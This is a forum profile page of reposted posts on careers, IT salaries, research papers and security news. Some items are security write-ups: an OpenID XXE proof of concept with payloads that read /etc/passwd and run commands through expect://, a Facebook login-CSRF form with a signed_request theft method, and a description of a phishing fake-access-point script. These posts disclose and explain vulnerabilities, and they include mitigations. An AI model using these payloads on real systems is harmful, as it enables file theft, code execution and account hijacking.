Jump to content

Nytro

Administrators
  • Posts

    18785
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. https://www.youtube.com/watch?v=ZWM74Pf_Kd0 Old school Dedicatie pentru texan. :->
  2. Exista astfel de persoane, persoane care abia termina facultatea (indiferent de notele obtinute) si se asteapta la salarii de mii de euro. In plus, daca te uiti pe CV-ul lor, nu o sa vezi niciun proiect si nicio actiune in care sa se fi implicat, astfel experienta 0. Sper ca voi sa fiti realisti, sa nu va luati muie urat de tot. Viata e grea. Chiar daca vedeti peste tot astfel de stiri, nu va asteptati sa sara lumea cu banii pe voi. Uitati-va singuri peste CV-ul vostru si ganditi din punctul de vedere al angajatorului. Intrebati-va cat ar merita cineva cu un CV ca al vostru. Eu am inceput cu 1600 RON si a fost ok, pentru ca am avut si oferte mai mici. Dar apoi a crescut, incet incet. Daca aveti rabdare si invatati, o sa fie mult mai usor in viitor. Si cand m-am angajat prima oara am aplicat pe la vreo 80 de firme, m-au sunat vreo 15 si eu chiar aveam destule proiecte in CV. De asemenea, daca sunteti angajati la o firma, nu sunteti platit bine, nu a fost nicio marire de salariu de mult timp si nici nu invatati mare lucru, sugestia mea e sa va cautati in alta parte de lucru. Nu e usor nici sa va gasiti de lucru. Poate va ganditi voi "Ba, eu sunt destept, ceilalti sunt prosti" dar veti vedea ca nu e chiar asa. Oricum, puteti fi Einstein al programarii, daca vine unu si cere mai putin decat voi, s-ar putea ca ala sa fie angajat. Stiu ca veneau persoane la interviuri care nu stiau ce e ala TCP si ce e ala UDP, care nu stiau sa dea un `cat` pe Linux si care nu puteau afisa numerele de pe diagonala principala a unei matrici patratice. Dar aveau pretentii salariale. Nu e bine nici sa fiti fraieri. Daca va descurcati la un interviu, cereti mai mult decat meritati. Daca nu se poate, exista posibilitatea sa va spuna "Nu va putem oferi atat, putem sa va oferim atat" sau sa va dea un sut in cur. Depind mai multe lucruri: despre ce firma e vorba, cum te-ai descurcat la interviu si cum s-au descurcat altii si foarte important, perioada in care vreti sa va angajati. Daca vreti sa va angajati in vara, ca sa vezi, si alti cateva mii de studenti vor sa faca acelasi lucru. Am mai fost la un interviu pe C++ la o firma si am stiut sa raspund perfect cam la toate intrebarile, care oricum erau banale, cu functii virtuale si alte lucruri simple si sincer, mi s-a parut ca stiu mai mult decat cei care imi luau interviul. Si nu m-au mai sunat. Apoi, am fost la un interviu pe C++ si algoritmica si m-am cam incurcat la partea de algoritmica (mai am de lucru la acest aspect) si ca sa vezi, m-au sunat si mi-au facut o oferta mai mare decat le cerusem eu. Un alt lucru ar fi urmatorul: daca de la inceput primiti un salariu mare, adica peste 30-35-40 de milioane, luati in calcul urmatoarea posibilitate: bre, astia nu cred ca o sa imi dea o marire prea curand. Apoi, mai trebuie luat in considerare si contractul, pentru ca s-ar putea sa nu puteti pleca vreo 2 ani de zile de la firma daca va plateste bine la inceput. Sugestie: cititi codul muncii, o sa va ajute. Cacat, am cam amestecat ideile, dar intelegeti voi ce am vrut sa spun.
  3. Nytro

    Fun stuff

    Via?a la birou: 15 experien?e inevitabile prin care to?i trecem la locul de munc? | adevarul.ro
  4. Cel mai dorit job din Romania: salariul urca la 6.000 de euro, somajul NU exista, mii de locuri raman neocupate Alice Gheorghe , 28 Jan 2014 Meseria de programator sta in fruntea listelor canalelor de recrutare, companiile duc lupte grele pentru a-i atrage si mentine pe specialisti, iar salariile de top pentru aceasta pozitie depasesc si de 10-15 de ori venitul mediu al romanilor. WALL-STREET.RO iti arata tot ce trebuie sa stii despre una dintre cele mai banoase si cu potential profesii din Romania. In piata din Romania sunt peste 60.000 de specialisti in domeniul IT, programatori fiind mai mult de jumatate dintre ei, potrivit datelor companiei de recrutare IT Temps. “Anual se creeaza aproximativ 5.000-6.000 de posturi noi, insa oferta de candidati este limitata la 2.000-3.000 de noi absolventi” a declarat pentru WALL-STREET.RO Gabriela Dan, CEO al Temps, companie de recrutare IT, parte a grupului Rinf Outsourcing Solutions. Mai departe, noile posturi deschise se inchid printr-o mobilitatea a candidatilor dintr-o companie in alta. Programatorii, cei mai cautati IT-isti Astfel, cea mai mare parte dintre job-uri disponibile in bazele de date ale agentiilor sau site-urilor de recrutare sunt cele din domeniul IT. La randul lor, acestea sunt dominate in general de pozitiile de programator. “40% din cererile de angajare pe zona de IT sunt pentru programatori”, a precizat Bogdan Florea, director general al companiei de recrutare Trenkwalder. “Avand in vedere boom-ul tehnologic din ultimii 5 ani, ce a adus in prim-plan limbaje de programare noi, meseria de programator ocupa un loc de top. Acest lucru se datoreaza nevoii de a crea aplicatii si platforme IT, ce vor inlocui sistemele clasice de informatii”, a explicat Cristina Savuica, sefa companiei de recrutare Lugera. Si in randul programatorilor exista un top in ceea ce priveste cele mai cautate specializari, iar in prezent pe piata locala sunt la mare cautare dezvoltatorii Java, urmati de C++ si Mobile (Android si IOS). “Programatorii de solutii enterprise sunt cei mai cautati, datorita anvergurii extinse pe care acest tip de proiecte o poate atinge. In ultima perioada Java Enterprise (J2EE) este un limbaj preferat pentru majoritatea acestor proiecte, secundat de catre solutiile Microsoft precum ASP .NET si .NET. De asemenea, observam o crestere rapida a nevoii de programatori cu experienta cel putin teoretica in servicii de tip Big Data sau Cloud. Conform unor studii LinkedIn, din 2008 nevoia a crescut de 3.440 ori pentru Big Data si 195 ori pentru Cloud services”, a detaliat Savuica. Cat castiga un programator in Romania Daca ai notiuni teoretice in domeniu solide si esti absolvent de automatica, cibernetica, informatica poti deja sa te gandesti la un salariu la care majoritatea romanilor nici nu viseaza. Sansele tale cresc daca inca din timpul facultatii te-ai implicat in proiecte de programare. In timp ce un incepator poate sa castige la primul job 500-600 de euro, ceea ce nu este deloc putin pentru piata locala, salariul unui profesionist in domeniu poate sa urce pana la 6.000 de euro lunar. “Un programator entry-level incepe de la un salariu mediu de 700 de euro, un junior in domeniu, cu 1-3 ani de experienta, castiga aproximativ 1.000 de euro, iar un specialist cu 3-6 ani de experienta urca la 2.000 de euro lunar. Seniorii ajung sa castige si 6.000 de euro pe luna”, au precizat reprezentantii companiei de recrutare Adecco. Astfel, intr-o piata cu tentatii mari, fluctuatia pe aceasta pozitie este destul de ridicata. “Avand in vedere ca piata ofera foarte multe "tentatii" la nivel financiar, este destul de greu sa retii oamenii in companie daca nu ai si programe de dezvoltare solide. Pe pozitiile de PHp, de exemplu, exista o fluctuatie foarte foarte mare, programatorii buni fiind sunati de cel putin doua ori pe saptamana de catre un posibil ofertant de job”, a mentionat Gabriela Dan, CEO al Temps. Developerii sunt momitii cu pachete financiare generoase la care se adauga diverse bonusuri, in functie de performanta. Cum te faci cautat pe aceasta piata “Un programator fara experienta trebuie sa acceseze cat mai multe cursuri si certificari on line. De asemenea, acesta trebuie sa isi constituie experienta prin inscriere pe site-uri consacrate de proiecte de programare, sa isi asume si sa duca la bun sfarsit proiecte mici, care insa contribuie la un cumul de experiente demonstrabile, project based”, sfatuiesc specialistii Adecco. De asemenea, importanta este si dobandirea cunostintelor de business necesare pentru a vedea impactul solutiilor dezvoltate atat pentru useri, cat si pentru business. “Este importanta dobandirea unei priviri de ansamblu asupra modului in care se integreaza diferitele arhitecturi de sisteme”, potrivit Lugera. Ce cauta angajatorii si nu gasesc Cei care se gandesc in prezent la o cariera in domeniul programarii trebuie sa stie ca sunt cateva specializari pentru care angajatorii gasesc cu greu candidatii potriviti. Recrutorii vorbesc despre o serie de specializari pe care le acopera cu greu, intre care programatorii Java, in special Java Mobile, C++ sau tehnologiile exotice de tip hadoop si magento. “Greu de acoperit sunt si specializarile cu salarii minime, pentru ca un specialist in IT vine si ramane la o companie daca aceasta are o reputatie buna, daca investeste in oameni, in certificari pentru acestia, daca le ofera acces la tehnologii performante”, spun specialistii Adecco. Specialistii romani sunt doriti si in afara O companie de top, experienta unui loc de munca intr-o alta cultura si, nu in ultimul rand, un salariu considerabil ii pot tenta pe tinerii care primesc o oferta din strainatate. “Unele companii straine ofera solutii colaborative de lucru la distanta, pentru a adresa nevoile echipelor distribuite de programatori. Companiile de peste hotare ofera oportunitati atractive si sunt dispuse sa ofere beneficii considerabile celor mai inovativi programatori. De obicei, se orienteaza catre cei mai inteligenti tineri absolventi de facultati sau targeteaza lideri inovativi cu o experienta rafinata in IT. Marii jucatori globali in tehnologie precum Google, Apple ii atrag pe tinerii programatori ce obtin performante outstading in diferitele consursuri, programe educationale si conferinte de IT pe care firmele le organizeaza online”, a explicat Cristina Savuica. Majoritatea tinerilor merg in afara pentru o experienta de cativa ani, avand mereu in plan reintoarcerea in tara. “Companiile mari, ca Google, Facebook, Apple, Microsoft atrag usor, datorita numelor din spate, si aici, insa programatorii romani nu se gandesc la o stabilire permanenta in extern, o fac pentru cativa ani, strang banii necesari pentru o independenta frumoasa in tara si revin pe plaiurile mioritice”, a precizat Gabriela Dan. Viitorul suna bine Fie ca aleg sa mearga in strainatate sau se specializeaza in tara, programatorii par sa aiba asigurat un loc de munca in urmatorii multi ani de zile. Piata este in continua crestere, iar in ciuda crizei economice, salariile raman la fel de bine platite. In 2014 majoritatea companiilor din domeniul IT vor angaja, potrivit datelor Temps. Dupa comunicatele transmise de catre aceste companii, iar cei mai mari angajatori vor fi Microsoft, Dell, Endava, Luxoft, IBM, Oracle, Deutsche Bank. Mai mult, un aspect important pentru acest domeniu este ca statul roman a oferit un plan de ajutor catre sapte companii care au in plan sa angajeze aproximativ 1.000 de programatori anul acesta in Romania, printre care Microsoft, Dell si Deutsche Bank. Sursa: Cel mai dorit job din Romania: salariul urca la 6.000 de euro, somajul NU exista, mii de locuri raman neocupate
  5. Really nice video collection. Sticky.
  6. Vanzarile se fac la RST Market doar de catre persoane care au 50+ posturi. Ban o saptamana.
  7. Applying Artificial Intelligence to Nintendo Tetris Abstract In this article, I explore the deceptively simple mechanics of Nintendo Tetris. Afterwards, I describe how to build an AI that exploits them. Table of Contents Abstract Table of Contents Try It Yourself About Preliminaries Download Run Configuration The Mechanics of Nintendo Tetris Representing Tetriminos Rotating Tetriminos Spawning Tetriminos Picking Tetriminos Shifting Tetriminos Dropping Tetriminos Slides and Spins Level 30 and Beyond Lines and Statistics Coloring Tetriminos Game Mode Legal Screen Demo The Kill Screen Endings 2 Player Versus Music and Sound Effects Play States and Render Modes The Algorithm Overview Searching for Lock Evaluation Function Other Factors AI Training Java Version About Packages AI Classes and Interfaces Invoking the AI Displaying the Playfield Other Projects Gamepad Version Try It Yourself About For those lacking the persistence, patience and time necessary to master Nintendo Tetris, I created an AI to play it for you. Finally, you can experience level 30 and beyond. You can witness the score max out while the line, level and statistics counters wraparound indefinitely. Find out what colors appear in levels higher than any human has ever reached. Discover how long it can go. Preliminaries To run the AI, you'll need FCEUX, the all-in-one NES/Famicom emulator. The AI was developed for FCEUX 2.2.2, the most recent version at the time of this writing. You'll also need the Nintendo Tetris ROM file (USA version). Google might be able to help you to track it down. Download Extract lua/NintendoTetrisAI.lua from this source zip. Run Start up FCEUX. From the menu bar, select File | Open ROM... In the Open File dialog box, select the Nintendo Tetris ROM file and press Open. The game will launch. From the menu bar, select File | Lua | New Lua Script Window... From the Lua Script window, enter the path to NintendoTetrisAI.lua or hit the Browse button to navigate to it. Finally, press Run. The Lua script will direct you to the first menu screen. Leave the game type as A-Type, but feel free to change the music using the arrow keys. On slower computers, the music may play choppy; you might want to disable it completely. Press Start (Enter) to advance to the next menu screen. In the second menu, you can change the starting level using the arrow keys. Press Start to begin the game. The AI will take over from there. From the second menu screen, after you select the level, if you hold down gamepad button A (use Config | Input... to modify the keyboard mapping) and press Start, the resulting starting level will be 10 plus the selected value. The highest starting level is 19. Articol: Applying Artificial Intelligence to Nintendo Tetris
  8. Nytro

    injdmp

    This is a project I started to learn C code. injdmp detects injected processes via searching memory marked as RWX, DLLs loaded using the registry values AppInit_DLLs & AppCertDlls, dummy processes and MZ headers in memory marked as . In the extra dir there is some code for detecting threads running in memory space marked as RWX. See the website for usage details. Disclaimer: Use at your own risk. OwnerAlexander Hanel Websitehttp://hooked-on-mne… Size 100.7 KB (download) Sursa: https://bitbucket.org/Alexander_Hanel/injdmp
  9. Static Analysis by Elimination Pavle Subotic1 , Andrew E. Santosa2 , and Bernhard Scholz Uppsala University, Sweden 2 Oracle Labs, Australia University of Sydney, Australia Abstract. In the past, elimination-based data flow analysis algorithms have been proposed as an alternative to iterative algorithms for solving dataflow problems. Elimination-based algorithms exhibit a better worst-case runtime performance than iterative algorithms. However, the implementation of elimination-based al- gorithms is more challenging and iterative algorithms have been sufficient for solving standard data-flow problems in compilers. For more generic abstract in- terpretation frameworks, it has not been explored whether elimination-based al- gorithms are useful. In this paper we show that elimination-based algorithms are useful for implementing abstract interpretation frameworks for low-level pro- gramming languages. We demonstrate the feasibility of our approach by a range analysis developed in the LLVM framework. We supplement this work by a range of experiments conducted through several test suites. Download: http://user.it.uu.se/~pasu4571/bytecode13.pdf
  10. Defending Against Tor-Using Malware, Part 1 11:48 pm (UTC-7) | by Jay Yaneza (Technical Support) In the past few months, the Tor anonymity service as been in the news for various reasons. Perhaps most infamously, it was used by the now-shuttered Silk Road underground marketplace. We delved into the topic of the Deep Web in a white paper titled Deepweb and Cybercrime. In our 2014 predictions, we noted that cybercriminals would go deeper underground – and part of that would be using Tor in greater numbers. Cybercriminals are clearly not blind to the potential of Tor, and network administrators have to consider that Tor-using malware might show up on their network. How should they react to this development? What’s Tor, anyway? Tor is designed to solve a fairly specific problem: to stop a man-in-the-middle (such as network administrators, ISPs, or even countries) from determining or blocking the sites that a user visits. How does it do this? Previously known as “The Onion Router”, Tor is an implementation of the concept of onion routing, where a number of nodes located on the Internet that serve as relays for Internet traffic. A user who wants to use the Tor network would install a client on their machine. This client would contact a Tor directory server, where it gets a list of nodes. The user’s Tor client would select a path for the network traffic via the various Tor nodes to the destination server. This path is meant to be difficult to follow. In addition, all traffic between nodes is encrypted. (More details about Tor may be found at the official website of the Tor project.) In effect, this hides your identity (or at least, IP address) from the site you visited, as well as any potential attackers inspecting your network traffic along the way. This is quite useful if you’re a visitor who wants to cover your tracks or if, for some reason, the server that you’re trying to connect to denies connections from your IP address. This can be done for both legitimate and illegitimate reasons. Unfortunately, this means that it can and has already been used for malicious purposes. How can it be used maliciously? Malware can just as easily use Tor as anyone else. In the second half of 2013, we saw more malware making use of it to hide their network traffic. In September, we blogged about the Mevade malware that downloaded a Tor component for backup command and control (C&C) communication. In October 2013, Dutch police arrested four persons behind the TorRAT malware, a malware family which also used Tor for its C&C communication. This malware family targeted the bank accounts of Dutch users, and investigation was difficult because of the use of underground crypting services to evade detection and the use of cryptocurrencies (like Bitcoin). In the last weeks of 2013, we saw some ransomware variants that called itself Cryptorbit that explicitly asked the victim to use the Tor Browser (a browser bundle pre-configured for Tor) when paying the ransom. (The name may have been inspired by the notorious CryptoLocker malware, which uses similar behavior.) Figure 1. Warning from Tor-using ransomware Earlier this month, we discussed several ZBOT samples that in addition to using Tor for its C&C connection, also embeds its 64-bit version ”inside” the normal, 32-bit version. Figure 2. Running 64-bit ZBOT malware This particular malware runs perfectly in a 64-bit environment and is injected into the running svchost.exe process, as is typically the case with injected malware. This increase in Tor-using malware means that network administrators may want to consider additional steps to be aware of Tor, how to spot its usage, and (if necessary) prevent its use. Illegitimate usage of Tor could result in various problems, ranging from circumvented IT policies to exfiltrated confidential information. We will discuss these potential steps in a succeeding blog post. Sursa: Defending Against Tor-Using Malware, Part 1 | Security Intelligence Blog | Trend Micro
  11. [h=2]PwnSTAR: Pwn SofT Ap scRipt[/h] A bash script to launch a Fake AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing and phishing. It can act as multi-client captive portal using php and iptables, Launches classic exploits such as evil-PDF. Features takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server steals WPA handshakes phishes email credentials serves webpages: supplied (eg hotspot, below) or provide your own sniffing with ferret and sslstrip adds a captive portal to the frontend of the fake AP assorted exploits de-auth with MDK3, aireplay-ng or airdrop-ng Use your imagination, craft your own webpages, and have fun. You can download the pwnstar script from here and save in your desktop Sursa: Hacking Articles|Raj Chandel's Blog: PwnSTAR: Pwn SofT Ap scRipt
  12. Detecting Custom Memory Allocators in C Binaries Xi Chen Asia Slowinska Herbert Bos Vrije Universiteit Amsterdam, The Netherlands Abstract—Many reversing techniques for data structures rely on the knowledge of memory allocation routines. Typically, they interpose on the system’s malloc and free functions, and track each chunk of memory thus allocated as a data structure. How- ever, many performance-critical applications implement their own custom memory allocators. Examples include webservers, database management systems, and compilers like gcc and clang. As a result, current binary analysis techniques for tracking data structures fail on such binaries. We present MemBrush, a new tool to detect memory allocation and deallocation functions in stripped binaries with high accu- racy. We evaluated the technique on a large number of real world applications that use custom memory allocators. As we show, we can furnish existing reversing tools with detailed information about the memory management API, and as a result perform an analysis of the actual application specific data structures designed by the programmer. Our system uses dynamic analysis and detects memory allocation and deallocation routines by searching for functions that comply with a set of generic characteristics of allocators and deallocators. Download: http://www.cs.vu.nl/~herbertb/papers/membrush_wcre13.pdf
  13. Revisting XXE and abusing protocols Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable. The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways that a site may do this discovery process, either through HTML or a YADIS discovery. Now this is where it gets interesting, HTML look-up is simply a HTML document with some meta information contained in the head tags: <head> <link rel="openid.server" href="http://www.example.com/myendpoint/" /> <link rel="openid2.provider" href="http://www.example.com/myendpoint/" /> </head> Whereas the Yadis discovery relies on a XRDS document: <xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>http://198.x.x.143:7804:/raw</URI> <openid:Delegate>http://198.x.x.143:7804/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS> Now if you have been paying attention the potential for exploitation should be jumping out at you. XRDS is simply XML and as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that when processed by an XML parser get interpreted and 'executed'. From the description given by Reginaldo the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery to a host we control. Our host would serve a tainted XRDS and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well formed XML and would not cause the parser to fail (a quick check can be done by using XML Validation: XML Validation) <?xml version="1.0" standalone="no"?> <!DOCTYPE xrds:XRDS [ <!ELEMENT xrds:XRDS (XRD)> <!ATTLIST xrds:XRDS xmlns:xrds CDATA "xri://$xrds"> <!ATTLIST xrds:XRDS xmlns:openid CDATA "http://openid.net/xmlns/1.0"> <!ATTLIST xrds:XRDS xmlns CDATA "xri://$xrd*($v*2.0)"> <!ELEMENT XRD (Service)*> <!ELEMENT Service (Type,URI,openid:Delegate)> <!ATTLIST Service priority CDATA "0"> <!ELEMENT Type (#PCDATA)> <!ELEMENT URI (#PCDATA)> <!ELEMENT openid:Delegate (#PCDATA)> <!ENTITY a SYSTEM 'http://198.x.x.143:7806/success.txt'> ]> <xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>http://198.x.x.143:7806/raw.xml</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>&a;</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS> In our example the fist <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>. To test this we set spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, OpenSource, Social platform that allowed for OpenID authentication. And then we tried out our PoC. "Testing for successful XXE" It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we know we have some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the Entity description for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This will cause the PHP filter function to be applied to our input stream (the file read) before the text was rendered. This served two purposes, firstly to ensure the file we were reading to introduce any XML parsing errors and secondly to make the output a little more user friendly. The first run with this modified payload didn't yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. A quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple python web server with no intelligence, this wasn't happening. Fortunately this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL. "The simple python webserver didn't obey the redirect instruction in the URL and the browser would be stuck at the downloaded identity file." "Hitting the back button and requesting OpenID login again would result in our XXE data being displayed in the URL." Finally all we needed to do was base64 decode the result from the URL and we would have the contents of /etc/passwd. "The decoded base64 string yielded the contents of /etc/passwd" This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (PHP: Installation - Manual). Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution. "RCE - retrieving the current user id" And Boom goes the dynamite. This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (PHP: Installation - Manual). Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution. "RCE - retrieving the current user id" And Boom goes the dynamite. All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser: libxml_disable_entity_loader(true); A good document with PHP security tips can be found here: Injection Attacks — Survive The Deep End: PHP Security :: v1.0a1 ./et - See more at: SensePost Blog And Boom goes the dynamite. All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser: libxml_disable_entity_loader(true); A good document with PHP security tips can be found here: Injection Attacks — Survive The Deep End: PHP Security :: v1.0a1 Sursa: SensePost Blog
  14. Nytro

    Fun stuff

    The World's Worst Penetration Test Report by #ScumbagPenTester "MySQL configured to allow connections from 127.0.0.1. Recommend configuration change to not allow remote connections." "Fixing the configuration will no longer allow evil connections by evil connection for configuration of server."
  15. [h=3]Two "WontFix" vulnerabilities in Facebook Connect[/h] TL;DR Every website with "Connect Facebook account and log in with it" is vulnerable to account hijacking. Every website relying on signed_request (for example official JS SDK) is vulnerable to account takeover, as soon as an attacker finds a 302 redirect to other domain. I don't think these will be fixed, as I've heard from the Facebook team that it will break compatibility. I really wish they would fix it though as you can see below, I feel these are serious issues. I understand the business reasons why they might choose so, but from my perspective when you have to choose between security and compatibility, the former is the right bet. Let me quickly describe what these bugs are and how you can protect your websites. CSRF on facebook.com login to hijack your identity. It's higher level Most-Common-OAuth-Vulnerability (we attached Attacker's Social Account to Victim's Client Account) but here even Clients using "state" to prevent CSRF are vulnerable. <iframe name="playground" src='data:text/html,<form id="genform" action="https://www.facebook.com/login.php" method="POST"><input type="hidden" name="email" value="homakov@gmail.com"><input type="hidden" name="pass" value="password"></form><script>genform.submit()</script>'></iframe> FYI we need data: trick to get rid of Referer header, Facebook rejects requests with cross domain Referers. This form logs victim in attacker's arbitrary account (even if user is already logged in, logout procedure is trivial). Now to all OAuth flows Facebook will respond with Attacker's profile information and Attacker's uid. Every website with "Connect your Facebook to main account to login faster" functionality is vulnerable to account hijacking as long as attacker can replace your identity on Facebook with his identity and connect their Facebook account to victim's account on the website just loading CLIENT/fb/connect URL. Once again: even if we cannot inject our callback with our code because of state-protection, we can re-login user to make Facebook do all the work for us! Almost all server-side libraries and implementations are "vulnerable" (they are not, it's Facebook who's vulnerable!) : omniauth, django-social-auth, etc. And yeah, official facebook-php-sdk. (By the way, I found 2 bugs in omniauth-facebook: state fixation, authentication bypass. Update if you haven't yet.) Mitigation: require CSRF token for adding a social connection. E.g. instead of /connect/facebook use /connect/facebook?authenticity_token=123qwe. It will make it impossible for an attacker to start the process by himself. Facebook JS SDK and #signed_request Since "redirect_uri" is flexible on Connect since its creation, Facebook engineers made it a required parameter to obtain "access_token" for issued "code". If the code was issued for a different (spoofed) redirect_uri, provider will respond with mismatch-error. signed_request is special non-standard transport created by Facebook. It carries "code" as well, but this code is issued for an empty redirect_uri = "". Furthermore, signed_request is sent in a #fragment, so it can be leaked easily with any 302 redirect to attacker's domain. And guess what — the redirect can even be on a subdomain. of our target! Attack surface gets so huge, no doubt you can find a redirecting endpoint on any big website. Basically, signed_request is exactly what "code" flow is, but with Leak-protection turned off. All you need is to steal victim's signed_request with a redirect to your domain (slice it from location.hash), then open the Client website, put it in the fbsr_CLIENT_ID cookie and hit client's authentication endpoint. Finally, you're logged in as the owner of that signed_request. It's just like when you steal username+password. Mitigation: it's hard to get rid from all the redirects. For example Facebook clients like soundcloud, songkick, foursquare are at the same time OAuth providers too, so they have to be able to redirect to 3rd party websites. Each redirect to their "sub" clients is also a threat to leak Facebook's token. Well, you can try to add #_=_ to "kill" fragment part.. It's better to stop using signed_request (get rid of JS SDK) and start using (slightly more) secure code-flow with protections I mentioned above. Conclusion In my opinion I'd recommend not using Facebook Connect in critical applications (nor with any other OAuth provider). Perhaps it's suitable quick login for a funny social game but never for a website with important data. Use oldschool passwords instead. If you must use Facebook Connect, I recommend whitelisting your redirect_uri in app's settings and requiring user interaction (clicking some button) to start adding a new connection. I really hope Facebook will change their mind, to stay trustworthy identity provider. Author: Egor Homakov on 10:27 PM Sursa: Egor Homakov: Two "WontFix" vulnerabilities in Facebook Connect
  16. Spy agencies are slurping personal data from leaky mobile apps by Lisa Vaas on January 29, 2014 The US' National Security Agency (NSA) and its UK counterpart, GCHQ, have been honing their data-slurping technologies to suck up whatever they can get from leaky smartphones, the Guardian reported on Tuesday. Beyond device details, data shared over the internet by iOS and Android apps can include personal information such as age, gender, and location, while some apps share even more sensitive user information, such as sexual preference or whether a given user might be a swinger. The Guardian, relying on top-secret documents handed over by whistleblower Edward Snowden, says that the spy guys are developing capabilities to milk this private information from apps as innocuous as the insanely popular Angry Birds game. Reporting in partnership with the New York Times and Pro Publica, they revealed that the NSA and GCHQ have "extensive tools" ready to throw against iPhone, Android and other phone platforms. The agencies also apparently think of Google Maps as a gold mine. The Guardian reports that one project involved intercepting Google Maps queries from smartphones to collect large volumes of location data. The newspaper quotes a 2008 document's gleeful assessment of the Google Maps work, in which it noted that: t effectively means that anyone using Google Maps on a smartphone is working in support of a GCHQ system. The documents suggest that, depending on how much information a user has provided in his or her profile on a given app, the agency could collect "almost every key detail of a user's life", the Guardian reports: home country, current location (through geolocation), age, gender, zip code, marital status - options included "single", "married", "divorced", "swinger" and more - income, ethnicity, sexual orientation, education level, and number of children. Given how popular Angry Birds is, and given that the secret documents use it as a case study, some articles have hung Angry Birds in their headlinery - that's like finery, but with headlines instead of undies. But Angry Birds shouldn't be singled out as being in any way subverted or corrupted by the NSA or GCHQ. Angry Birds is, after all, just one of thousands of mobile apps, none of which has been indicted as complicit with, or data-raked by, the NSA or GCHQ - rather, the spying agencies are, as news reports say, simply tapping data as it flies across the network. Rovio, the maker of Angry Birds, told the Guardian that it wasn't aware of any NSA or GCHQ programs looking to extract data from its apps users. The newspaper quotes Saara Bergström, Rovio's VP of marketing and communications: Rovio doesn't have any previous knowledge of this matter, and have not been aware of such activity in third-party advertising networks. Nor do we have any involvement with the organisations you mentioned [NSA and GCHQ]. The NSA's data sniffing is far from news, of course - the names PRISM and XKeyscore should ring some bells in that department. Much of the profile data in question isn't being nefariously pickpocketed from app users, at any rate. As Naked Security pointed out on Monday in honor of Data Privacy Day, many of us are willingly giving our personal data away. It's easy to see why: it's a heck of a lot more fun to have apps spill your beans, since in exchange we get linked to communities or get shiny doo-dads. All we have to do is fill out profiles with stuff they actually don't, really, need - birthdates, marital status, etc. We can take back a big chunk of our privacy simply by refusing to hand over data, whether it's given in a profile or beamed out when we have WiFi and/or geolocation turned on. Cinching our data waistbands can be done with three simple steps, outlined by Naked Security in the Privacy Plan Diet. If you can live without "Find My iPad" or other such geolocation-dependent goodies, you can keep a lot of your data out of the hands of spies, marketers or other data busybodies. But beyond information knowingly handed over in profiles, phone apps have a nasty habit of sharing more data than users may realize. Sometimes the holes come from software bugs, but then again, sometimes data leakage is an unintended 